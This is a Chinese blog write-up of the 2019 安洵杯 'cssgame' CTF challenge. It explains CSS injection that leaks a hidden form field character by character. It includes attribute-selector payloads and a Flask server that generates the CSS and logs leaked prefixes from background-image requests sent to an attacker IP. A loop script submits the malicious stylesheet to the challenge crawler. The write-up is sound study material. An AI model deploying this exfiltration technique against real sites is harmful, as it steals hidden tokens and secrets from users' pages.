发布于 

安洵杯2019-cssgame题目复现

题目考点

Css注入

题目分析

题目界面

1

F12可看到内网中的flag.html的内容

1
2
3
4
5
6
7
8
<html>
<link rel="stylesheet" href="${encodeURI(req.query.css)}" />
<form>
<input name="Email" type="text" value="test">
<input name="flag" type="hidden" value="202cb962ac59075b964b07152d234b70"/>
<input type="submit" value="提交">
</form>
</html>

flag的属性是hidden,无法直接看到,在这里我们只能控制flag.html加载我们自定义的CSS文件,这里可使用CSS选择器逐位匹配爆破出flag,参考官方wp,payload如下

1
input[name=flag][value^="b"] ~ * {background-image: url("http://x.x.x.x/b");}

该段payload input[name=flag][value^="b"]参考

2

便于理解可以看下下面的例子

4

后半部分~ * {background-image: url("http://x.x.x.x/b");},根据官方wp描述,有时候无法加载background-image,所以需要使用~ *

3

接着来理解下~ *

5

6

那么我们就可以通过这样逐位爆破的方法得到属性为hidden的flag

可以参考学习下下面文章中的脚本

https://www.glacierluo.com/exercise/ctf/web/cssgame/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from flask import Flask
app = Flask(__name__)

dic = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}-"

result = ""

@app.route('/poc.css')
def payload():
global result
res = ''''''
for i in dic:
j = ''.join((result, i))
res += '''input[name=flag][value^="'''+j+'''"] ~ * {background-image:url("http://172.16.157.212:8899/'''+j+'''");}\n'''
return res, 200, [("Content-Type", "text/css")]

@app.route('/<flag>')
def all(flag):
global result
result = flag
print(flag)
return flag

app.run(host='0.0.0.0', port=8899)

可能是由于网络原因不是每次都可以触发flag的回显,写个python脚本循环请求

1
2
3
4
5
6
7
8
9
10
import requests
import time
session = requests.session()
while 1:
burp0_url = "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn:80/crawl.html"
burp0_cookies = {"UM_distinctid": "176929086fa3a0-0b0ed985080c69-163b6153-13c680-176929086fb472", "_ga": "GA1.2.602800589.1608776974", "_gid": "GA1.2.1740085603.1609750409"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Origin": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"css": "http://172.16.157.212:8899/poc.css"}
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
time.sleep(3)

7

参考文章

https://xz.aliyun.com/t/6911#toc-12

https://www.glacierluo.com/exercise/ctf/web/cssgame/


本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。

本站由 @yemoli 创建,使用 Stellar 作为主题。